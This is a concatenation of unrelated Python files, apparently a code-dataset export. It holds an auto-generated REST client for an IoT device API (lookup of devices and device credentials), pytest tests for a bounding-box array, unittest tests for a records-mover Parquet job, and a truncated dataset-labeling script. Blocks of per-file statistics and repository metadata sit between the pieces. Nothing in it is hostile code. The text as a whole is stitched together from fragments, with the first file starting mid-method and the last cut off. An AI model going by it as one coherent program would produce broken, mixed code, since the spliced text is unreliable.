query_params.append(('textSearch', params['text_search']))
if 'id_offset' in params:
query_params.append(('idOffset', params['id_offset']))
if 'text_offset' in params:
query_params.append(('textOffset', params['text_offset']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/customer/{customerId}/devices', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TextPageDataDevice',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_device_by_id_using_get(self, device_id, **kwargs):
"""
getDeviceById
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_device_by_id_using_get(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_device_by_id_using_get_with_http_info(device_id, **kwargs)
else:
(data) = self.get_device_by_id_using_get_with_http_info(device_id, **kwargs)
return data
def get_device_by_id_using_get_with_http_info(self, device_id, **kwargs):
"""
getDeviceById
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_device_by_id_using_get_with_http_info(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_device_by_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_id' is set
if ('device_id' not in params) or (params['device_id'] is None):
raise ValueError("Missing the required parameter `device_id` when calling `get_device_by_id_using_get`")
collection_formats = {}
path_params = {}
if 'device_id' in params:
path_params['deviceId'] = params['device_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/device/{deviceId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Device',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_device_credentials_by_device_id_using_get(self, device_id, **kwargs):
"""
getDeviceCredentialsByDeviceId
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_device_credentials_by_device_id_using_get(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: DeviceCredentials
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_device_credentials_by_device_id_using_get_with_http_info(device_id, **kwargs)
else:
(data) = self.get_device_credentials_by_device_id_using_get_with_http_info(device_id, **kwargs)
return data
def get_device_credentials_by_device_id_using_get_with_http_info(self, device_id, **kwargs):
"""
getDeviceCredentialsByDeviceId
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_device_credentials_by_device_id_using_get_with_http_info(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: DeviceCredentials
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_device_credentials_by_device_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_id' is set
if ('device_id' not in params) or (params['device_id'] is None):
raise ValueError("Missing the required parameter `device_id` when calling `get_device_credentials_by_device_id_using_get`")
collection_formats = {}
path_params = {}
if 'device_id' in params:
path_params['deviceId'] = params['device_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/device/{deviceId}/credentials', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeviceCredentials',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_device_types_using_get(self, **kwargs):
"""
getDeviceTypes
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_device_types_using_get(async=True)
>>> result = thread.get()
:param async bool
:return: list[EntitySubtype]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_device_types_using_get_with_http_info(**kwargs)
else:
(data) = self.get_device_types_using_get_with_http_info(**kwargs)
return data
def get_device_types_using_get_with_http_info(self, **kwargs):
"""
getDeviceTypes
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_device_types_using_get_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[EntitySubtype]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_device_types_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/device/types', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[EntitySubtype]',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_devices_by_ids_using_get(self, device_ids, **kwargs):
"""
getDevicesByIds
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_devices_by_ids_using_get(device_ids, async=True)
>>> result = thread.get()
:param async bool
:param str device_ids: deviceIds (required)
:return: list[Device]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_devices_by_ids_using_get_with_http_info(device_ids, **kwargs)
else:
(data) = self.get_devices_by_ids_using_get_with_http_info(device_ids, **kwargs)
return data
def get_devices_by_ids_using_get_with_http_info(self, device_ids, **kwargs):
"""
getDevicesByIds
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_devices_by_ids_using_get_with_http_info(device_ids, async=True)
>>> result = thread.get()
:param async bool
:param str device_ids: deviceIds (required)
:return: list[Device]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_ids']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_devices_by_ids_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_ids' is set
if ('device_ids' not in params) or (params['device_ids'] is None):
raise ValueError("Missing the required parameter `device_ids` when calling `get_devices_by_ids_using_get`")
collection_formats = {}
path_params = {}
query_params = []
if 'device_ids' in params:
query_params.append(('deviceIds', params['device_ids']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/devices', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Device]',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tenant_device_using_get(self, device_name, **kwargs):
"""
getTenantDevice
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_tenant_device_using_get(device_name, async=True)
>>> result = thread.get()
:param async bool
:param str device_name: deviceName (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_tenant_device_using_get_with_http_info(device_name, **kwargs)
else:
(data) = self.get_tenant_device_using_get_with_http_info(device_name, **kwargs)
return data
def get_tenant_device_using_get_with_http_info(self, device_name, **kwargs):
"""
getTenantDevice
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_tenant_device_using_get_with_http_info(device_name, async=True)
>>> result = thread.get()
:param async bool
:param str device_name: deviceName (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_name']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tenant_device_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_name' is set
if ('device_name' not in params) or (params['device_name'] is None):
raise ValueError("Missing the required parameter `device_name` when calling `get_tenant_device_using_get`")
collection_formats = {}
path_params = {}
query_params = []
if 'device_name' in params:
query_params.append(('deviceName', params['device_name']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/tenant/devices', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Device',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_device_credentials_using_post(self, device_credentials, **kwargs):
"""
saveDeviceCredentials
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.save_device_credentials_using_post(device_credentials, async=True)
>>> result = thread.get()
:param async bool
:param DeviceCredentials device_credentials: deviceCredentials (required)
:return: DeviceCredentials
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.save_device_credentials_using_post_with_http_info(device_credentials, **kwargs)
else:
(data) = self.save_device_credentials_using_post_with_http_info(device_credentials, **kwargs)
return data
def save_device_credentials_using_post_with_http_info(self, device_credentials, **kwargs):
"""
saveDeviceCredentials
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.save_device_credentials_using_post_with_http_info(device_credentials, async=True)
>>> result = thread.get()
:param async bool
:param DeviceCredentials device_credentials: deviceCredentials (required)
:return: DeviceCredentials
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_credentials']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method save_device_credentials_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_credentials' is set
if ('device_credentials' not in params) or (params['device_credentials'] is None):
raise ValueError("Missing the required parameter `device_credentials` when calling `save_device_credentials_using_post`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'device_credentials' in params:
body_params = params['device_credentials']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/device/credentials', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeviceCredentials',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_device_using_post(self, device, **kwargs):
"""
saveDevice
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.save_device_using_post(device, async=True)
>>> result = thread.get()
:param async bool
:param Device device: device (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.save_device_using_post_with_http_info(device, **kwargs)
else:
(data) = self.save_device_using_post_with_http_info(device, **kwargs)
return data
def save_device_using_post_with_http_info(self, device, **kwargs):
"""
saveDevice
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.save_device_using_post_with_http_info(device, async=True)
>>> result = thread.get()
:param async bool
:param Device device: device (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method save_device_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device' is set
if ('device' not in params) or (params['device'] is None):
raise ValueError("Missing the required parameter `device` when calling `save_device_using_post`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'device' in params:
body_params = params['device']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/device', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Device',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def unassign_device_from_customer_using_delete(self, device_id, **kwargs):
"""
unassignDeviceFromCustomer
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.unassign_device_from_customer_using_delete(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.unassign_device_from_customer_using_delete_with_http_info(device_id, **kwargs)
else:
(data) = self.unassign_device_from_customer_using_delete_with_http_info(device_id, **kwargs)
return data
def unassign_device_from_customer_using_delete_with_http_info(self, device_id, **kwargs):
"""
unassignDeviceFromCustomer
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.unassign_device_from_customer_using_delete_with_http_info(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method unassign_device_from_customer_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_id' is set
if ('device_id' not in params) or (params['device_id'] is None):
raise ValueError("Missing the required parameter `device_id` when calling `unassign_device_from_customer_using_delete`")
collection_formats = {}
path_params = {}
if 'device_id' in params:
path_params['deviceId'] = params['device_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/customer/device/{deviceId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Device',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.200459
| 149
| 0.563037
| 5,497
| 53,849
| 5.203202
| 0.035838
| 0.027411
| 0.025453
| 0.032725
| 0.958395
| 0.943745
| 0.926788
| 0.9163
| 0.902524
| 0.883749
| 0
| 0.000374
| 0.354826
| 53,849
| 1,306
| 150
| 41.232006
| 0.822894
| 0.031031
| 0
| 0.781116
| 0
| 0
| 0.169372
| 0.05254
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.008584
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
974d64013e0973492350a3982ef9edfed233eead
| 3,578
|
py
|
Python
|
base/tests/test_data_structures_bounding_boxes.py
|
mhernan88/detection-enhancer
|
c7825ea6a22633755f2b74279ab27b886fcda8e8
|
[
"Apache-2.0"
] | null | null | null |
base/tests/test_data_structures_bounding_boxes.py
|
mhernan88/detection-enhancer
|
c7825ea6a22633755f2b74279ab27b886fcda8e8
|
[
"Apache-2.0"
] | 1
|
2020-10-26T21:39:15.000Z
|
2020-10-26T21:39:15.000Z
|
base/tests/test_data_structures_bounding_boxes.py
|
mhernan88/detection-enhancer
|
c7825ea6a22633755f2b74279ab27b886fcda8e8
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import numpy as np
from od_toolbelt import BoundingBoxArray
from .test_utils.setup_tests import setup_test_case, one_additional
def test_check1():
"""Test check without arguments"""
bounding_boxes, confidences, labels, _ = setup_test_case()
bb = BoundingBoxArray(
bounding_boxes=bounding_boxes, confidences=confidences, labels=labels
)
bb.check()
def test_check2():
"""Test check with arguments"""
bounding_boxes, confidences, labels, _ = setup_test_case()
bounding_box, confidence, label = one_additional()
bb = BoundingBoxArray(
bounding_boxes=bounding_boxes, confidences=confidences, labels=labels
)
bb.check(bounding_box=bounding_box, confidence=confidence, label=label)
def test_check3():
"""Test check without arguments - warn"""
bounding_boxes, confidences, labels, _ = setup_test_case()
bounding_boxes = bounding_boxes.astype(np.int64)
bb = BoundingBoxArray(
bounding_boxes=bounding_boxes, confidences=confidences, labels=labels
)
with pytest.warns(SyntaxWarning):
bb.check()
def test_check4():
"""Test check without arguments - warn"""
bounding_boxes, confidences, labels, _ = setup_test_case()
confidences = confidences.astype(np.int64)
bb = BoundingBoxArray(
bounding_boxes=bounding_boxes, confidences=confidences, labels=labels
)
with pytest.warns(SyntaxWarning):
bb.check()
def test_check5():
"""Test check without arguments - warn"""
bounding_boxes, confidences, labels, _ = setup_test_case()
labels = labels.astype(np.float64)
bb = BoundingBoxArray(
bounding_boxes=bounding_boxes, confidences=confidences, labels=labels
)
with pytest.warns(SyntaxWarning):
bb.check()
def test_check6():
"""Test check with arguments - warn"""
bounding_boxes, confidences, labels, _ = setup_test_case()
bounding_box, confidence, label = one_additional()
bounding_box = bounding_box.astype(np.int64)
bb = BoundingBoxArray(
bounding_boxes=bounding_boxes, confidences=confidences, labels=labels
)
with pytest.warns(SyntaxWarning):
bb.check(bounding_box=bounding_box, confidence=confidence, label=label)
def test_check7():
"""Test check without arguments - fail bb range"""
bounding_boxes, confidences, labels, _ = setup_test_case()
bounding_boxes[0, 0, 0] = 1.01
bb = BoundingBoxArray(
bounding_boxes=bounding_boxes, confidences=confidences, labels=labels
)
with pytest.raises(ValueError):
bb.check()
def test_check9():
"""Test check without arguments - fail bb shape len"""
bounding_boxes, confidences, labels, _ = setup_test_case()
bounding_boxes = np.array(
(
((0.04, 0.19, 0.12), (0.14, 0.29, 0.81)),
((0.11, 0.15, 0.02), (0.21, 0.25, 0.14)),
),
dtype=np.float64,
)
bb = BoundingBoxArray(
bounding_boxes=bounding_boxes, confidences=confidences, labels=labels
)
with pytest.raises(ValueError):
bb.check()
def test_append1():
"""Test append without arguments"""
bounding_boxes, confidences, labels, _ = setup_test_case()
before_length = bounding_boxes.shape[0]
bounding_box, confidence, label = one_additional()
bb = BoundingBoxArray(
bounding_boxes=bounding_boxes, confidences=confidences, labels=labels
)
bb.append(bounding_box=bounding_box, confidence=confidence, label=label)
assert bb.bounding_boxes.shape[0] == before_length + 1
| 27.736434
| 79
| 0.691448
| 410
| 3,578
| 5.812195
| 0.170732
| 0.180025
| 0.181284
| 0.109106
| 0.810743
| 0.810743
| 0.784725
| 0.784725
| 0.759127
| 0.660512
| 0
| 0.022425
| 0.202348
| 3,578
| 128
| 80
| 27.953125
| 0.812544
| 0.089156
| 0
| 0.54321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012346
| 1
| 0.111111
| false
| 0
| 0.049383
| 0
| 0.160494
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
978bc71d6014546f88e39ba7ec4ca6c5524f1254
| 4,073
|
py
|
Python
|
tests/unit/records/test_jobs_hints_and_parquet_records_format.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 36
|
2020-03-17T11:56:51.000Z
|
2022-01-19T16:03:32.000Z
|
tests/unit/records/test_jobs_hints_and_parquet_records_format.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 60
|
2020-03-02T23:13:29.000Z
|
2021-05-19T15:05:42.000Z
|
tests/unit/records/test_jobs_hints_and_parquet_records_format.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 4
|
2020-08-11T13:17:37.000Z
|
2021-11-05T21:11:52.000Z
|
import unittest
from mock import Mock, patch
from records_mover.records.job.mover import run_records_mover_job
from records_mover.records.records_format import ParquetRecordsFormat
from contextlib import contextmanager
class TestJobsHintsAndParquetRecordsFormat(unittest.TestCase):
maxDiff = None
@patch('records_mover.records.job.mover.Session')
def test_parquet(self, mock_Session):
mock_source = Mock(name='source')
mock_target = Mock(name='target')
@contextmanager
def mysource(records_format=None):
self.assertIsInstance(records_format, ParquetRecordsFormat)
yield mock_source
@contextmanager
def mytarget(db_engine):
yield mock_target
mock_job_name = Mock(name='job_name')
mock_session = mock_Session.return_value
mock_records = mock_session.records
mock_records.sources.mysource = mysource
mock_records.targets.mytarget = mytarget
config = {
'fail_if_dont_understand': False,
'source': {
'format': 'parquet'
},
'target': {
'db_name': 'foo'
},
}
out = run_records_mover_job(source_method_name='mysource',
target_method_name='mytarget',
job_name=mock_job_name,
config=config)
mock_records.move.assert_called()
self.assertEqual(out, mock_records.move.return_value)
@patch('records_mover.records.job.mover.Session')
def test_parquet_with_delimited_hint_format_first(self, mock_Session):
mock_source = Mock(name='source')
mock_target = Mock(name='target')
@contextmanager
def mysource(records_format=None):
self.assertIsInstance(records_format, ParquetRecordsFormat)
yield mock_source
@contextmanager
def mytarget(db_engine):
yield mock_target
mock_job_name = Mock(name='job_name')
mock_session = mock_Session.return_value
mock_records = mock_session.records
mock_records.sources.mysource = mysource
mock_records.targets.mytarget = mytarget
config = {
'fail_if_dont_understand': False,
'source': {
'format': 'parquet',
'compression': 'GZIP',
},
'target': {
'db_name': 'foo'
},
}
with self.assertRaises(NotImplementedError):
run_records_mover_job(source_method_name='mysource',
target_method_name='mytarget',
job_name=mock_job_name,
config=config)
@patch('records_mover.records.job.mover.Session')
def test_parquet_with_delimited_hint_hint_first(self, mock_Session):
mock_source = Mock(name='source')
mock_target = Mock(name='target')
@contextmanager
def mysource(records_format=None):
self.assertIsInstance(records_format, ParquetRecordsFormat)
yield mock_source
@contextmanager
def mytarget(db_engine):
yield mock_target
mock_job_name = Mock(name='job_name')
mock_session = mock_Session.return_value
mock_records = mock_session.records
mock_records.sources.mysource = mysource
mock_records.targets.mytarget = mytarget
config = {
'fail_if_dont_understand': False,
'source': {
'compression': 'GZIP',
'format': 'parquet',
},
'target': {
'db_name': 'foo'
},
}
with self.assertRaises(NotImplementedError):
run_records_mover_job(source_method_name='mysource',
target_method_name='mytarget',
job_name=mock_job_name,
config=config)
| 35.417391
| 74
| 0.586055
| 387
| 4,073
| 5.852713
| 0.147287
| 0.058278
| 0.043709
| 0.038852
| 0.848565
| 0.836645
| 0.824283
| 0.824283
| 0.824283
| 0.824283
| 0
| 0
| 0.332433
| 4,073
| 114
| 75
| 35.72807
| 0.833027
| 0
| 0
| 0.77
| 0
| 0
| 0.105328
| 0.045667
| 0
| 0
| 0
| 0
| 0.07
| 1
| 0.09
| false
| 0
| 0.05
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
979a4d35d0ab6245974c294bb86d6d0272814287
| 7,745
|
py
|
Python
|
Data/labeler.py
|
cocoalowonou/ToyotaSmartHome
|
dcde13adcf00ba071be6f44e45fe8da1ba43b269
|
[
"Apache-2.0"
] | 1
|
2021-04-24T02:32:38.000Z
|
2021-04-24T02:32:38.000Z
|
Data/labeler.py
|
cocoalowonou/ToyotaSmartHome
|
dcde13adcf00ba071be6f44e45fe8da1ba43b269
|
[
"Apache-2.0"
] | 1
|
2021-01-29T11:28:06.000Z
|
2021-01-29T11:28:06.000Z
|
Data/labeler.py
|
cocoalowonou/ToyotaSmartHome
|
dcde13adcf00ba071be6f44e45fe8da1ba43b269
|
[
"Apache-2.0"
] | 1
|
2021-01-26T09:40:29.000Z
|
2021-01-26T09:40:29.000Z
|
import os
from glob import glob
from sklearn.model_selection import train_test_split
# ======================================================================================================
# data structure
# ======================================================================================================
# cross-subject(subject id) => train: 3, 4, 6, 7, 9, 12, 13, 15, 17, 19, 25 | test: remaining 7 subjects
# cross-view1(camera id) => train: 1 | validation: 5 | test: 2
# cross-view2(camera id) => train: 1, 3, 4, 6, 7 | validation: 5 | test: 2
#
# csv header => sub directory file path, index, category
# official site: https://project.inria.fr/toyotasmarthome/
#
# *files root path means is bellow
# ex)
# json (files_root_path)
# L xxx.json
# L xxx.json
# .
# .
# .
# ======================================================================================================
def cross_subject(files_root_path: str, save_path: str):
# path check
if not os.path.exists(save_path):
os.makedirs(save_path)
# read a files path(root path of the toyotasmarthome files)
files_path = glob(os.path.join(files_root_path, "*"))
trains = []; tests = []; activitynames = []
for file_path in files_path:
filename = file_path.split("/")[-1]
# Activityname_p[id]_r[XX]_[XX]_c[0-7]
splited_filename = filename.split("_")
# get a activityname from splited filename
activityname = splited_filename[0]
# get a subject id from splited fimename
subject_id = int(splited_filename[1][1:])
# for indexing
if not activityname in activitynames:
activitynames.append(activityname)
# making label
label = "{},{},{}".format(filename, activitynames.index(activityname), activityname)
if subject_id in [3, 4, 6, 7, 9, 12, 13, 15, 17, 19, 25]:
trains.append(label) # train
else:
tests.append(label) # test
print(f"[cross subject] train: {len(trains)}, test: {len(tests)}, categories: {len(activitynames)}")
# save
with open(os.path.join(save_path, "train.csv"), "w") as f:
f.writelines("\n".join(trains))
with open(os.path.join(save_path, "test.csv"), "w") as f:
f.writelines("\n".join(tests))
def cross_view1(files_root_path: str, save_path: str):
# path check
if not os.path.exists(save_path):
os.makedirs(save_path)
# read a files path(root path of the toyotasmarthome files)
files_path = glob(os.path.join(files_root_path, "*"))
trains = []; vals = []; tests = []; activitynames = []
for file_path in files_path:
filename = file_path.split("/")[-1]
# Activityname_p[id]_r[XX]_[XX]_c[0-7]
splited_filename = filename.split("_")
# get a activityname from splited filename
activityname = splited_filename[0]
# get a camera id from splited filename
